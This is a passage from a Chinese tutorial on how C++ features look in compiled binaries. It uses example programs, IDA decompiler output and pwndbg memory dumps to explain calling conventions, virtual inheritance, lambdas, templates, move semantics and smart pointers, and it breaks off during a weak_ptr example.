.data.rel.ro:0000000000003D18 B4 13 00 00 00 00 00 00 dq offset _ZN1A4foobEv ; A::foob(void)
1
2
3
4
5
6
.data.rel.ro:0000000000003CC0 D4 12 00 00 00 00 00 00       off_3CC0 dq offset _ZN4Base4foo1Ev      ; DATA XREF: B::B(void)+18↑o
.data.rel.ro:0000000000003CC0 ; Base::foo1(void)
.data.rel.ro:0000000000003CC8 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003CD0 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003CD8 EC 13 00 00 00 00 00 00 dq offset _ZN1B4fooaEv ; B::fooa(void)
.data.rel.ro:0000000000003CE0 24 14 00 00 00 00 00 00 dq offset _ZN1B4foobEv ; B::foob(void)

调用约定

C/C++ 函数调用约定,主要是对以下两个方面进行了约定:

  • 当参数个数多于一个时,按照什么顺序把参数压入堆栈(参数的入栈顺序)
  • 函数调用后,由谁来把堆栈恢复原状

常见的调用方式有:

  • C 语言:__cdecl __stdcall __fastcall naked __pascal
  • C++ 语言:__cdecl __stdcall __fastcall naked __pascal __thiscall

下面就分别介绍这几种调用方式:

__stdcall:Standard Call 的缩写,是 Win32 API 使用的标准调用方式

  • 使用 PASCAL 宏,WINAPI 宏和 CALLBACK 宏来指定函数的调用方式为 stdcall
1
int _stdcall function(int a, int b); // 明确指定用stdcall
  • 参数从右向左依次压入堆栈
  • 由被调用函数自己来恢复堆栈,称为自动清栈
  • 函数名自动加前导下划线,后面紧跟着一个@,其后紧跟着参数的大小

__cdecl:C Declaration 的缩写,cdecl 调用方式又称为C调用方式,是32位C程序默认的调用方式

1
2
int function(int a, int b) // 不加修饰符就是cdecl
int _cdecl function(int a, int b) // 明确指定用cdecl
  • 参数从右向左依次压入堆栈
  • 由调用者恢复堆栈,称为手动清栈
  • 函数名自动加前导下划线

__fastcall:一种快速调用方式(通过 CPU 寄存器来传递参数);IDA 会把 64 位程序默认的寄存器传参约定也标注为 __fastcall,下面以 Linux x86-64(System V ABI)为例

1
int _fastcall function(int a, int b); // 明确指定用fastcall
  • 前6个参数分别放入 RDI,RSI,RDX,RCX,R8,R9
  • 其余参数从右向左依次压入堆栈
  • 如果需要用栈传参,则使用手动清栈

__thiscall:唯一一个不能明确指明的函数修饰,因为 thiscall 不是关键字,是C++类成员函数默认的调用约定

  • 由于成员函数调用还有一个 this 指针,因此必须特殊处理
  • this 指针将作为第一个参数传入,其余参数处理和 __cdecl/__fastcall 一样(取决于程序是32位还是64位)

__stdcall 与 __cdecl 的不同之处:

  • stdcall 方式是在函数返回时利用 retn x 指令清除栈中的参数
  • cdecl 方式是函数返回后,由调用函数者修改 esp 的值来清除栈中的参数

多重继承

一个派生类如果只继承一个基类,称作单继承,那么如果继承了多个基类,就称作多继承

1
class C:public A,public B{};

1685892862095

  • 优点:派生类通过多重继承,可以得到多个基类的数据和方法,更大程度的实现了代码复用
  • 缺点:可能会导致某个类被重复构造,可能得到重复的基类数据

案例:多重继承导致重复基类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :public A{
public:
C(int data):A(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
class D :public B, public C{
public:
D(int data):B(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

int main(){
D* a = new D(10);
return 0;
}
1
2
3
4
5
A()
B()
A()
C()
D()
  • A被构造了两次

虚继承

在继承方式前面加上 virtual 关键字就是虚继承

1
class B:virtual public A{};
  • 如果虚继承类拥有派生类,则构造虚基类的任务将会交给派生类完成

案例:虚继承解决重复基类的问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :virtual public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :virtual public A{
public:
C(int data):A(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
class D :public B, public C{
public:
D(int data):A(data),B(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

int main(){
D* a = new D(10);
return 0;
}
  • PS:由于 B 和 C 都虚继承 A,因此最终派生类 D 需要在自己的初始化列表中完成虚基类 A 的构造(此时 B、C 初始化列表中的 A(data) 会被忽略)
1
2
3
4
A()
B()
C()
D()

案例:虚基类的构造问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :virtual public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :public B{
public:
C(int data):A(data),B(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
class D :public C{
public:
D(int data):A(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

int main(){
D* a = new D(10);
return 0;
}
  • 由于 B 虚继承 A,因此派生类 C、D 都有可能负责虚基类 A 的构造
  • 虚基类总是由最终派生类(即实际被创建对象所属的类,这里是 D)负责构造

虚基类的内存布局:

1
2
3
4
5
00:0000│     0x55555556aea0 ◂— 0x0
01:0008│     0x55555556aea8 ◂— 0x21 /* '!' */
02:0010│ rbx 0x55555556aeb0 —▸ 0x555555557cb8 ◂— 0x555555557cb8
03:0018│     0x55555556aeb8 ◂— 0xc0000000b /* '\x0b' */
04:0020│     0x55555556aec0 ◂— 0xa0000000d /* '\r' */
  • 虚继承的子类都有一个虚基类指针,其指向虚基类表(虚基类指针和虚函数的虚指针不是同一个东西)
  • 虚继承底层实现原理与编译器相关,一般通过虚基类指针和虚基类表实现
1
2
3
4
5
6
7
8
pwndbg> telescope 0x55555556aea0
00:0000│     0x55555556aea0 ◂— 0x0
01:0008│     0x55555556aea8 ◂— 0x31 /* '1' */
02:0010│ rbx 0x55555556aeb0 —▸ 0x555555557c28 ◂— 0x0
03:0018│     0x55555556aeb8 ◂— 0xc0000000b /* '\x0b' */
04:0020│     0x55555556aec0 ◂— 0xd /* '\r' */
05:0028│     0x55555556aec8 —▸ 0x555555557c40 —▸ 0x55555555536c (A::fun()) ◂— endbr64
06:0030│     0x55555556aed0 ◂— 0xa /* '\n' */
  • 这里的 0x555555557c40 就是A类的虚指针,而 0x555555557c28 是D类的虚基类指针

匿名函数 Lambda

lambda 函数是一种匿名函数,它表示一个接受参数并返回一个值的函数

lambda 函数的语法如下:

1
[capture](parameters) -> return_type { function_body }

测试样例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <stdio.h>

typedef int (*lambda_ta)(int);
typedef int (*lambda_tb)(int,int);
typedef double (*lambda_tc)(double);

lambda_ta lambdaA = [](int a) -> int {
return a * 2;
};

lambda_tb lambdaB = [](int a,int b) -> int {
return a * b;
};

int main() {
int x0 = 5;
int x1 = lambdaA(x0);
int x2 = lambdaB(x0,x1);
double y0 = x1 + x2;
double y1 = [](double a) -> double {
return a * 2;
}(y0);

return 0;
}
  • 在底层,局部匿名函数和全局匿名函数的实现不同
1
2
3
4
x0 = 5;
x1 = lambdaA(5);
y0 = (double)(x1 + lambdaB(5, x1));
main::{lambda(double)#1}::operator()(&__closure, y0);
  • 匿名函数和普通函数本质上的区别就是:匿名函数不能通过函数名来调用
  • 调用全局匿名函数其实是调用全局变量上对应的函数指针:
1
2
3
4
5
6
7
8
.data:0000000000004010                               public lambdaA
.data:0000000000004010 ; lambda_ta lambdaA
.data:0000000000004010 1A 12 00 00 00 00 00 00 lambdaA dq offset _ZN7lambdaAMUliE_4_FUNEi
.data:0000000000004010 ; DATA XREF: main+22↑r
.data:0000000000004018 public lambdaB
.data:0000000000004018 ; lambda_tb lambdaB
.data:0000000000004018 55 12 00 00 00 00 00 00 lambdaB dq offset _ZN7lambdaBMUliiE_4_FUNEii
.data:0000000000004018 ; DATA XREF: main+33↑r
  • 而局部匿名函数本质上是对 () 的重载
  • 调用局部匿名函数其实是调用对应的重载函数:
1
2
3
4
5
6
double __cdecl main::{lambda(double)#1}::operator()(
const main::$256B327EE357AF9FCD813216707B60D5 *const __closure,
double a)
{
return a + a; /* PS:编译器对这里进行了优化 */
}

泛型编程

模板是泛型编程的基础,泛型编程即以一种独立于任何特定类型的方式编写代码

模板有两类:函数模板,类模板

函数模板

不规定某个函数的传参类型或者返回值类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <iostream>
#include <string>

using namespace std;

/*
 * Exchange the values held by two objects of the same type.
 * T must be copy-constructible and copy-assignable; the compiler
 * instantiates one copy of this function per distinct T it is called with.
 */
template <class T>
void Swap(T &num1, T& num2){
    T saved = num1;   /* keep the first value while it is overwritten */
    num1 = num2;
    num2 = saved;
}

int main() {
int a = 10, b = 20;
Swap(a,b); /* 函数模板实例化 */
cout << "a :" << a << "b :" << b << endl;

float c = 10.55f, d = 3.14f;
Swap(c, d); /* 函数模板实例化 */
cout << "c :" << c << "d :" << d << endl;
}
  • 函数模板不规定参数类型,返回值类型
  • 在编译时,编译器会根据实际传参来创建不同类型的副本,这个过程被称为函数模板实例化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
a = 10;
b = 20;
Swap<int>(&a, &b); /* 函数模板实例化(创建int类型的副本) */
v3 = std::operator<<<std::char_traits<char>>(&std::cout, &unk_2005);
v4 = std::ostream::operator<<(v3, (unsigned int)a);
v5 = std::operator<<<std::char_traits<char>>(v4, &unk_2009);
v6 = std::ostream::operator<<(v5, (unsigned int)b);
std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
c = 10.55;
d = 3.1400001;
Swap<float>(&c, &d); /* 函数模板实例化(创建float类型的副本) */
v7 = std::operator<<<std::char_traits<char>>(&std::cout, &unk_200D);
v8 = std::ostream::operator<<(v7, *(double *)_mm_cvtsi32_si128(LODWORD(c)).m128i_i64);
v9 = std::operator<<<std::char_traits<char>>(v8, &unk_2011);
v10 = std::ostream::operator<<(v9, *(double *)_mm_cvtsi32_si128(LODWORD(d)).m128i_i64);
std::ostream::operator<<(v10, &std::endl<char,std::char_traits<char>>);

1686123247822

下面是一个特殊的案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <iostream>
#include <cassert>
using namespace std;

int add(int a,int b){
return a+b;
}

typedef int (*lambda_t)(int,int);
lambda_t sub = [](int a,int b) -> int {
return a-b;
};

template <typename Fn>
void func(Fn const &fn){
int a = 10;
int b = 5;
cout << fn(a,b) << endl;
}

int main(){
func(add);
func([](int a,int b) -> int {
return a * b;
});
func(sub);
}
  • 函数模板和类模板都可以将 “函数指针” 当做类型
1
2
3
func<int ()(int,int)>((int (*)(int, int))add); /* 普通函数 */
func<main::{lambda(int,int)#1}>(&fn); /* 局部匿名函数 */
func<int (*)(int,int)>(&sub); /* 全局匿名函数 */

类模板

不规定该类中某个函数的传参类型或返回值类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <iostream>
#include <string>
#include <cassert>

namespace mzt {
/*
 * Minimal growable array used to demonstrate class-template instantiation.
 *
 * Storage starts empty; push_back() grows it to 4 slots and then doubles it
 * whenever it is full.
 *
 * NOTE: the class declares no destructor or copy operations, so the final
 * buffer is never released and copies share the same buffer.
 */
template<class T>
class vector {
public:
    vector() : _a(nullptr),_size(0),_capacity(0){}

    /* Append a copy of data, growing the buffer first when it is full. */
    void push_back(const T& data) {
        if (_capacity == _size) {
            size_t newcapacity = _capacity == 0 ? 4 : _capacity * 2;
            T* tmp = new T[newcapacity];
            assert(tmp);
            /* carry the existing elements over to the larger buffer */
            for (size_t i = 0; i < _size; ++i) {
                tmp[i] = _a[i];
            }
            /* store the new element before the old buffer is released:
               data may refer to an element that lives in that buffer */
            tmp[_size] = data;
            delete[] _a;
            _a = tmp;
            _capacity = newcapacity;
            ++_size;
            return;
        }
        _a[_size++] = data;
    }

    /* Access the element at pos; pos must be smaller than getsize(). */
    T& operator[](size_t pos) {
        assert(pos < _size);
        return _a[pos];
    }

    /* Number of elements stored so far. */
    size_t getsize() {
        return _size;
    }
private:
    T* _a;            /* heap buffer holding the elements */
    size_t _size;     /* number of elements in use */
    size_t _capacity; /* number of elements the buffer can hold */
};
}

using namespace std;

int main() {
mzt::vector<int> a; /* 类模板实例化 */
a.push_back(1);
a.push_back(2);
mzt::vector<double> b; /* 类模板实例化 */
b.push_back(3.0);
b.push_back(4.0);
}
  • 类模板实例化与函数模板实例化不同
  • 类模板实例化需要在类模板名字后跟 <> 指定类型(函数模板实例化也可以用 <> 指定类型,即使没有,编译器也会自动识别类型)
1
2
3
4
5
6
7
8
9
10
mzt::vector<int>::vector(&a); /* 类模板实例化 */
LODWORD(b._a) = 1;
mzt::vector<int>::push_back(&a, (const int *)&b);
LODWORD(b._a) = 2;
mzt::vector<int>::push_back(&a, (const int *)&b);
mzt::vector<double>::vector(&b); /* 类模板实例化 */
data = 3.0;
mzt::vector<double>::push_back(&b, &data);
data = 4.0;
mzt::vector<double>::push_back(&b, &data);

模板特例化

在原模板类的基础上,针对特殊类型所进行特殊化的实现方式

模板特化中分为:函数模板特化,类模板特化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <iostream>
#include <cstring>

using namespace std;

bool IsEqual(int left, int right) {
return left == right;
}

template<class T>
bool IsEqual(const T& left, const T& right) {
return left == right;
}

template< >
bool IsEqual<const char *>(const char* const& left,
const char* const& right) {
return strcmp(left, right) == 0;
}

int main(){
int a = 0;
int b = 1;
const char* p1 = "hello";
const char* p2 = "hello";
bool ret;

ret = IsEqual(a, b);
ret = IsEqual<int>(a, b);
ret = IsEqual<const char*>(p1, p2);
}
1
2
3
4
5
6
7
v4 = 0;
v5 = 1;
v6 = "hello";
v7[0] = "hello";
IsEqual(0, 1); /* 调用普通函数(最优先) */
IsEqual<int>(&v4, &v5); /* 调用模板函数 */
IsEqual<char const*>(&v6, v7); /* 调用特例化的模板函数(次优先) */
  • 如果遇到相同普通函数(函数名和类型都相同),编译器则会优先调用普通函数(最优先)
  • 如果指定类型匹配,特例化的模板函数会比普通的模板函数优先调用(次优先)

类型形参 & 非类型形参

模板参数分类:类型形参、非类型形参

  • 类型形参:出现在模板参数列表中,跟在 class 或者 typename 之后的参数类型名称
  • 非类型形参:就是用一个常量作为类(函数)模板的一个参数,在类(函数)模板中可将该参数当成常量来使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <iostream>
#include <cassert>

namespace mzt {
/*
 * Fixed-size array used to demonstrate type and non-type template parameters.
 * T is the element type (type parameter, defaults to int) and N is the number
 * of elements (non-type parameter, defaults to 10).
 */
template<class T = int, size_t N = 10> /* T: type parameter, N: non-type parameter */
class Array {
public:
    /* Access the element at pos; pos must be smaller than N. */
    T& operator[](size_t pos) { /* overloads [] */
        assert(pos < N); /* arr has exactly N slots */
        return arr[pos];
    }
private:
    T arr[N];
};
}

int main(){
mzt::Array< > a; /* 不提供模板参数,使用缺省值 */
a[0]=1;
a[1]=2;
return 0;
}
1
2
*mzt::Array<int,10ul>::operator[](&a, 0LL) = 1;
*mzt::Array<int,10ul>::operator[](&a, 1uLL) = 2;

右值引用

左值 & 右值

  • 左值是可以放在赋值号左边、可以被赋值的表达式,左值必须在内存中有实体(可以取地址)
    • 当左值被赋值给其他变量时,左值本身保留
  • 右值是只能出现在赋值号右边、用来给其他变量提供值的表达式,右值可以在内存中,也可以只存在于 CPU 寄存器中
    • 右值通常是临时值,所在的表达式求值结束后就会被销毁
1
2
3
4
5
6
7
8
9
10
11
12
13
#include <iostream>
#include <memory>
using namespace std;

int main(){
int a = 10;
int &b = a; /* 左值引用(b相当于a的别名) */
int &&c = 20; /* 右值引用(c相当于20的别名) */

cout << &a << ":" << a << endl;
cout << &b << ":" << b << endl;
cout << &c << ":" << c << endl;
}
1
2
3
0x7ffc2d216c30:10
0x7ffc2d216c30:10
0x7ffc2d216c34:20

IDA 分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
v13 = 10; /* int a = 10 */
v15 = &v13; /* int &b = a */
v14 = 20; /* int &&c = 20 */
v16 = &v14;
v3 = std::ostream::operator<<(&std::cout, &v13);
v4 = std::operator<<<std::char_traits<char>>(v3, ":");
v5 = std::ostream::operator<<(v4, v13);
std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);
v6 = std::ostream::operator<<(&std::cout, v15);
v7 = std::operator<<<std::char_traits<char>>(v6, ":");
v8 = std::ostream::operator<<(v7, *v15);
std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);
v9 = std::ostream::operator<<(&std::cout, v16);
v10 = std::operator<<<std::char_traits<char>>(v9, ":");
v11 = std::ostream::operator<<(v10, *v16);
std::ostream::operator<<(v11, &std::endl<char,std::char_traits<char>>);
  • 在底层,右值引用相当于是赋值与左值引用的结合

std::move

std::move 唯一的功能是将一个左值强制转化为右值引用

1
2
3
4
template <class _Ty>
inline _CONST_FUN typename remove_reference<_Ty>::type&& move(_Ty&& _Arg) _NOEXCEPT {
return (static_cast<typename remove_reference<_Ty>::type&&>(_Arg));
}
  • 如果是左值,就通过 static_cast 将传进来的参数强转为右值并返回
  • 如果是右值,直接返回
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <iostream>
#include <utility>
#include <vector>
#include <string>
using namespace std;

int main(){
std::string s = "Hello";
std::string sleft;
std::string sright;

sleft = s; /* 左值赋值 */
std::cout << s << endl;
std::cout << sleft << endl;
sright = std::move(s); /* 右值赋值 */
std::cout << s << endl;
std::cout << sright << endl;
}
1
2
3
4
Hello
Hello

Hello
  • 左值赋值:字符串 s 仍然存在
  • 右值赋值:字符串 s 被置空

IDA 分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
std::allocator<char>::allocator(&v9, argv, envp);
std::string::basic_string<std::allocator<char>>(v10, "Hello", &v9);
std::allocator<char>::~allocator(&v9);
std::string::basic_string(v11);
std::string::basic_string(v12);
std::string::operator=(v11, v10);
v3 = std::operator<<<char>(&std::cout, v10);
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
v4 = std::operator<<<char>(&std::cout, v11);
std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
v5 = std::move<std::string &>(v10);
std::string::operator=(v12, v5);
v6 = std::operator<<<char>(&std::cout, v10);
std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
v7 = std::operator<<<char>(&std::cout, v12);
std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
std::string::~string(v12);
std::string::~string(v11);
std::string::~string(v10)
  • std::move 在底层会直接返回参数的原始值,真正置空字符串 s 的操作是 std::string::operator=() 函数
1
2
3
4
__int64 __fastcall std::move<std::string &>(__int64 a1)
{
return a1;
}
  • 仔细分析可以发现左值赋值和右值赋值调用的 std::string::operator=() 函数不一样
1
2
.text:0000000000002509 E8 E2 FC FF FF                call    __ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_ ; std::string::operator=(std::string const&)
.text:0000000000002509
1
2
.text:0000000000002577 E8 84 FD FF FF                call    __ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_ ; std::string::operator=(std::string&&)
.text:0000000000002577

拷贝构造函数 & 移动构造函数

如果想用其它对象初始化一个同类的新对象,只能借助类中的拷贝构造函数

  • 其实现原理是为新对象复制一份和其它对象一模一样的数据
  • 当类中拥有指针类型的成员变量时,拷贝构造函数中需要以深拷贝的方式复制该指针成员

移动构造函数使用右值引用形式的参数

  • 在此构造函数中,num 指针变量采用的是浅拷贝的复制方式
  • 在函数内部置空了 d.num(为了避免 “同一块堆空间被释放多次”)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <iostream>
using namespace std;

/*
 * Owns a single heap-allocated int and logs every special member call,
 * to contrast copy construction (deep copy) with move construction
 * (pointer hand-over).
 */
class demo{
public:
    /* Default constructor: allocate the int and set it to 1. */
    demo():num(new int(1)){
        cout<<"construct!"<<endl;
    }
    /* Copy constructor (deep copy): allocate a new int holding the same value.
       A moved-from source has num == NULL, so it is copied as NULL instead of
       being dereferenced. */
    demo(const demo &d):num(d.num ? new int(*d.num) : NULL){
        cout<<"copy construct!"<<endl;
    }
    /* Move constructor: take over the source's pointer and clear it in the
       source, so the allocation is released exactly once. */
    demo(demo &&d):num(d.num){
        d.num = NULL;
        cout<<"move construct!"<<endl;
    }
    /* Destructor: release the owned int (deleting NULL is a no-op). */
    ~demo(){
        delete num;
        cout<<"class destruct!"<<endl;
    }
    int *num; /* owned allocation; NULL after being moved from */
};

demo get_demo(){
return demo();
}

int main(){
demo a = get_demo();
demo b = a;
demo c = move(a);
return 0;
}

IDA 分析:

1
2
3
4
5
6
7
get_demo((demo *)v5);
demo::demo((demo *)v6, (const demo *)v5); /* 拷贝构造 */
v3 = std::move<demo &>(v5);
demo::demo(v7, v3); /* 移动构造 */
demo::~demo((demo *)v7);
demo::~demo((demo *)v6);
demo::~demo((demo *)v5);
1
2
3
4
5
6
7
8
9
10
11
void __fastcall demo::demo(demo *this, const demo *a2)
{
_DWORD *v2; // rax
__int64 v3; // rax

v2 = (_DWORD *)operator new(4uLL);
*v2 = **(_DWORD **)a2;
*(_QWORD *)this = v2;
v3 = std::operator<<<std::char_traits<char>>(&std::cout, "copy construct!");
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
}
1
2
3
4
5
6
7
8
9
__int64 __fastcall demo::demo(_QWORD *a1, _QWORD *a2)
{
__int64 v2; // rax

*a1 = *a2;
*a2 = 0LL;
v2 = std::operator<<<std::char_traits<char>>(&std::cout, "move construct!");
return std::ostream::operator<<(v2, &std::endl<char,std::char_traits<char>>);
}

智能指针

智能指针 (Smart Pointer) 是一种在 C++ 中用于管理动态分配的内存的类,它提供了一种灵活的方式来管理对象的生命周期,可以避免资源泄漏和内存错误

auto_ptr

当对象过期时,其析构函数将自动使用 delete 来释放内存:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#include <iostream>
#include <memory>
using namespace std;

class Auto {
public:
Auto() { cout << "Auto create" << endl; }
~Auto() { cout << "Auto delete" << endl; }
int key1 = 10;
int key2 = 20;
};

int main(){
auto_ptr<Auto> test(new Auto);
int key1 = (*test).key1;
int key2 = test->key2;
int key3 = key1 + key2;
cout << key3 << endl;
return 0;
}
  • 栈上的对象会在当前语句块结束时释放,堆上的对象需要使用 delete 释放
  • auto_ptr 属于栈上的对象,在它的析构函数中会尝试 delete 目标对象

IDA 分析如下:

1
2
3
4
5
6
7
8
v5 = (Auto *)operator new(8uLL);
Auto::Auto(v5); /* Auto的构造函数 */
std::auto_ptr<Auto>::auto_ptr(v8, v5); /* auto_ptr的构造函数 */
v6 = *(_DWORD *)std::auto_ptr<Auto>::operator*(v8);
v7 = v6 + *(_DWORD *)(std::auto_ptr<Auto>::operator->(v8) + 4);
v3 = std::ostream::operator<<(&std::cout, v7);
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
std::auto_ptr<Auto>::~auto_ptr(v8); /* auto_ptr的析构函数 */
  • auto_ptr 的析构函数中会自动释放 Auto(传入对象):
1
2
3
4
5
6
7
8
9
10
11
void __fastcall std::auto_ptr<Auto>::~auto_ptr(Auto **a1)
{
Auto *v1; // rbx

v1 = *a1;
if ( *a1 )
{
Auto::~Auto(*a1);
operator delete(v1, 8uLL);
}
}
  • auto_ptr 创建的对象仍然具有指针的性质,其原因是 auto_ptr 对 * 和 -> 等运算符进行了重载
1
2
3
4
__int64 __fastcall std::auto_ptr<Auto>::operator*(__int64 a1)
{
return *(_QWORD *)a1;
}
1
2
3
4
__int64 __fastcall std::auto_ptr<Auto>::operator->(__int64 a1)
{
return *(_QWORD *)a1;
}
  • PS:对 * 和 -> 的重载只是返回内部保存的原始指针,成员的具体偏移仍由调用处计算

unique_ptr

unique_ptr 和 auto_ptr 的用法几乎一样,另外添加了如下几个特性:

  • 基于排他所有权模式:两个指针不能指向同一个资源
  • 无法进行左值 unique_ptr 复制构造,也无法进行左值复制赋值操作,但允许临时右值赋值构造和赋值
  • 在 STL 容器中使用 unique_ptr,不允许直接赋值
  • 支持对象数组的内存管理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <iostream>
#include <memory>
using namespace std;

int main(){
unique_ptr<string> p1(new string("11111111"));
unique_ptr<string> p2(new string("22222222"));

//p1 = p2; // 禁止左值赋值
//unique_ptr<string> p3(p2); // 禁止左值赋值构造

cout << "p1:" << p1.get() << endl;
cout << "p2:" << p2.get() << endl;

unique_ptr<string> p3(std::move(p2));
p2 = std::move(p1); // 使用move把左值转成右值就可以赋值了,效果和auto_ptr赋值一样

cout << "-------------------" << endl;
cout << "p1:" << p1.get() << endl;
cout << "p2:" << p2.get() << endl;
cout << "p3:" << p3.get() << endl;
}
1
2
3
4
5
6
p1:0x559625bfdeb0
p2:0x559625bfdee0
-------------------
p1:0
p2:0x559625bfdeb0
p3:0x559625bfdee0

IDA 分析如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 std::allocator<char>::allocator(v27, argv, envp);
v23 = (void *)operator new(0x20uLL);
std::string::basic_string<std::allocator<char>>(v23, "11111111", v27);
std::unique_ptr<std::string>::unique_ptr<std::default_delete<std::string>,void>(v25, v23); /* unique_ptr的构造函数 */
std::allocator<char>::~allocator(v27);
std::allocator<char>::allocator(v27, v23, v3);
v24 = (void *)operator new(0x20uLL);
std::string::basic_string<std::allocator<char>>(v24, "22222222", v27);
std::unique_ptr<std::string>::unique_ptr<std::default_delete<std::string>,void>(v26, v24); /* unique_ptr的构造函数 */
std::allocator<char>::~allocator(v27);

......

v10 = std::move<std::unique_ptr<std::string> &>(v26); /* 把左值转成右值 */
std::unique_ptr<std::string>::unique_ptr(v27, v10); /* unique_ptr的构造函数 */
v11 = std::move<std::unique_ptr<std::string> &>(v25); /* 把左值转成右值 */
std::unique_ptr<std::string>::operator=(v26, v11);

......

std::unique_ptr<std::string>::~unique_ptr(v27);
std::unique_ptr<std::string>::~unique_ptr(v26);
std::unique_ptr<std::string>::~unique_ptr(v25)

shared_ptr

shared_ptr 基于非排他所有权模式:允许多个指针指向同一个资源

  • 当拷贝构造或拷贝赋值时,引用计数加 “1”
  • 当智能指针析构时,引用计数减 “1”
  • 如果计数为 “0”,代表已经没有指针指向这块内存,那么就释放它
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include <iostream>
#include <memory>
using namespace std;

/*
 * Custom deleter passed to std::shared_ptr<string>: prints the string and
 * then releases it. shared_ptr hands ownership of the pointer to the
 * deleter, so the deleter itself must free the object.
 */
void deleteStr(string* p) {
    if (p == nullptr) { /* nothing to print or free */
        return;
    }
    cout << *p << endl;
    delete p;
}

int main(){
string* str = new string("11111111");
std::shared_ptr<string> p1(str, deleteStr);
std::shared_ptr<string> p2(p1);
std::shared_ptr<string> p3(p2);

cout << "p1 count = " << p1.use_count() << endl;
cout << "p2 count = " << p2.use_count() << endl;
cout << "p3 count = " << p3.use_count() << endl;

p1 = NULL;
p2 = NULL;

cout << "p1 count = " << p1.use_count() << endl;
cout << "p2 count = " << p2.use_count() << endl;
cout << "p3 count = " << p3.use_count() << endl;

p3 = NULL;
cout << "22222222" << endl;

return 0;
}
1
2
3
4
5
6
7
8
p1 count = 3
p2 count = 3
p3 count = 3
p1 count = 0 /* p1被置空 */
p2 count = 0 /* p2被置空 */
p3 count = 1 /* shared_ptr的计数器为"1" */
11111111 /* 当shared_ptr的计数器为"0"时,调用析构函数 */
22222222

weak_ptr

weak_ptr 是为配合 shared_ptr 而引入的一种智能指针,它只可以从一个 shared_ptr 或另一个 weak_ptr 对象构造

weak_ptr 提供的是一个弱引用:

  • 弱引用不更改引用计数,类似普通指针

shared_ptr 提供的是一个强引用:

  • 当对象被创建时,计数为 “1”,每创建一个变量引用该对象时,该对象的计数就增加“1”,当上述变量销毁时,对象的计数减 “1”,当计数为 “0” 时,这个对象也就被析构了
  • 强引用计数在很多种情况下都是可以正常工作的,但是也有不奏效的时候,当出现循环引用时,就会出现严重的问题
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <iostream>
#include <memory>
using namespace std;

class parent;
class children;
